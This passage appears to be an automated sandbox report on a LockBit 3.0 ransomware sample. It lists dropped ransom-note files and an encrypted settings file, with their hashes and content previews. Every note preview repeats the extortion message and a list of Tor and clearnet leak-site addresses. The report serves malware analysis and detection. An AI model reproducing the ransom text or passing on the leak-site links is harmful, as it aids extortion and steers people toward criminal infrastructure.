                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\onesettings_waas_featuremanagement\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Features\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\MobilityExperience\ImageCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\MobilityExperience\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):65775
                Entropy (8bit):7.997452902896006
                Encrypted:true
                SSDEEP:1536:KIqtBA8AL2u2kIS3R4FFF9a91lZjphZ3nbPASNJm:Aw8yukIAR2bw975vZ3EuJm
                MD5:944A7C34C909A047C0C6042DE1B32F1B
                SHA1:4389353807F97980C9F3CE2A11ADF7767556B2F4
                SHA-256:F22673858039079A15C875F46FFC20A7EFEA1BD0F4B9F0BCB2A1E238DB23B8CF
                SHA-512:AB9E61ED48788826ACB78E593F1E412609F87A385FA35A993B5C8DB203733418BECBA7631BD2B272FA197D81A8AD481517C18E3E59AD22F45338F37658A398D3
                Malicious:true
                Preview:......D...m._..%....\t...;'..VX...P...&..jf....yZf.4.:.....g.]..@..1m.>.y..4C:m...(/.....4.Td...<TU.-..z.A.6....R.>.....%>...ay..K.?1v.2..i..f.g"...Y.y...S..........L.~F.,....I..~../...%..f.4...).EZ.r..r.!;....i..^z...}!..P......".F?.r..cZ.8 K.....%...[.....PnAU{..x]V............N6_.........s7.....*H.........\^..+..(]u..U.|.D.D...S+....9.N..q[..6..9..8c$6d.........m.?....HK..bp..U..['6K....[r.../. rg.%..Q&..$...K.~....`.......dq.V...Q..-. ....96..K............JYwk.>.B.x6.H...#{.o=.)(..t..h.....rtH...T#.;.2.?.C.#..A/.F}....X..B>/.7.....z..P...5b.....y..)....[.Y.j......(.......y#+....+s.....)q.9..P..."Z......\R{....b.......".....$..2.3.C..[6...j.G...._..v..UK.h..N.@(.L._Xsd......c.........~.a..2[......:2<.MO(..?9r.Q...=.V....:.xK...vUU.].Y...'..].5...q........)*.{....x...(-.kZ\.._$M.>..r..#...P..eK.......u9....B..Q&LX.*..9..o..1.8ge.N....B~..&r ...3.td1x@z..O}..~..q..2.y.J'.^.U..w..;..JP....&..dy.b.}......_w....~..r).|E...

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
